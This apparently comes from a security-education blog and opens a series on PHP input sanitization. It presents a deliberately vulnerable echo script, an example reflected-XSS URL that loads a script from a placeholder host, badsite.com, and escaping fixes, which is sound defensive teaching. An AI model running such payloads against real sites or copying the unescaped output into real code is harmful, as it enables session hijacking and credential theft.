Most XSS and SQL injection vulnerabilities are due to improper sanitization of input data.

Cleaning such data is vitally important in maintaining the security of a website or web application.

This series of blog posts will examine several input sanitization examples within a PHP environment (raw data, data within attribute fields, database sanitization, etc.).

The series also assumes you know a bit about writing PHP code, since we will be using some PHP functions. However, the general ideas we cover apply to all dynamic web apps, regardless of the platform on which they are created.

Note: There are ways to clean MOST input data by simply using special libraries or a series of functions. However, by covering basic cases (including how each one poses a threat and how each one may be corrected individually) we are able to give a much broader view of the fundamental problems associated with improper data sanitization and the dangers of injection.

Case 1: Basic Raw Data Input/Output

This case is for the (probably rare) situations in which your code displays exactly what the user typed into the body of the HTML output (not necessarily within a tag itself).

Example Script: example1.php

---------------------------
<?php

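// Read the value straight from the request; default to an empty string if it is missing.
$test_input = $_REQUEST['test_input'] ?? '';
// VULNERABLE: the value is echoed into the page exactly as the user typed it.
echo " You entered: $test_input ";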
?>
---------------------------

Assuming $test_input is the variable we want to clean up, we simply need to make sure that the data doesn’t have any HTML tags in it. After all, without tags, it is just text data. If this data were displayed without sanitization, a malicious user could easily inject some <script> tags and do… bad things. Very bad. Horrifying even.

It’d look something like this:

http://example.com/example1.php?test_input=<script src="http://badsite.com/verybad/omg_this_is_horrifying.js"></script>

This would inject a script element, and the script hosted at badsite.com would then execute in the visitor's browser, within the context of the vulnerable website. The results can range from stolen credentials to session hijacking to phishing attempts.
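
To see why this works, here is a minimal sketch of what the vulnerable script sends back for a payload like the one in the URL above. The helper name render_unsafe() is hypothetical (it is not part of example1.php); it just wraps the same string interpolation so the result can be inspected.

```php
<?php

// Hypothetical helper: builds the same string that example1.php echoes.
function render_unsafe(string $test_input): string
{
    return " You entered: $test_input ";
}

// A payload like the one in the URL above, as PHP would see it after URL decoding.
$payload = '<script src="http://badsite.com/verybad/omg_this_is_horrifying.js"></script>';

// The tag comes back out untouched, so the browser treats it as markup, not text.
echo render_unsafe($payload), "\n";
```

Nothing in the output separates "text the user typed" from "markup the page author wrote", which is exactly what the attacker is counting on.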

So, to clean those pesky HTML tags, we can simply convert the left and right angle brackets to something a little more pleasant. Blank spaces, non-blank blank spaces, pictures of kittens, etc. Personally, I prefer the HTML special character entities &lt; and &gt; since they look the same as the HTML tag delimiters, but are completely harmless. (Pro tip: lt and gt stand for ‘less than’ and ‘greater than’ respectively.)

There are many ways to do the switcheroo… but here is one example:

Example Script: example1_fixed.php

---------------------------
<?php

$test_input = $_REQUEST['test_input'] ?? ''; // default to an empty string if missing
$test_input = str_replace('<', "&lt;", $test_input); // first the left angle bracket
$test_input = str_replace('>', "&gt;", $test_input); // then the right angle bracket
echo "<html><body> You entered: $test_input </body></html>";
?>
---------------------------
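
As a sketch of one of the other ways to do the switcheroo, PHP's built-in htmlspecialchars() function performs the same angle bracket replacement and converts ampersands and quotes as well. The wrapper name clean_for_html() and the choice of ENT_QUOTES and UTF-8 are assumptions for illustration, not part of the example script above.

```php
<?php

// Hypothetical wrapper around PHP's built-in htmlspecialchars().
// ENT_QUOTES and 'UTF-8' are assumed settings; adjust them to match your page's encoding.
function clean_for_html(string $test_input): string
{
    return htmlspecialchars($test_input, ENT_QUOTES, 'UTF-8');
}

// Default to an empty string if the parameter is missing.
$test_input = $_REQUEST['test_input'] ?? '';
echo "<html><body> You entered: " . clean_for_html($test_input) . " </body></html>";
```

With this version, a request containing a script tag would show up on the page as literal text rather than being run by the browser.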

Now your code will sanitize that input and protect against XSS attacks of this nature. However, things get hairy when that data is used as an attribute within a tag or in other sensitive parts of the HTML source.

But that will be covered in Part 2: Data Used as an Attribute Within a Tag or in Other Sensitive Parts of the HTML Source.

Each Tuesday, Security Musings features a topic to help educate our readers about security. For more information about Gemini Security Solutions’ security education capabilities, contact us!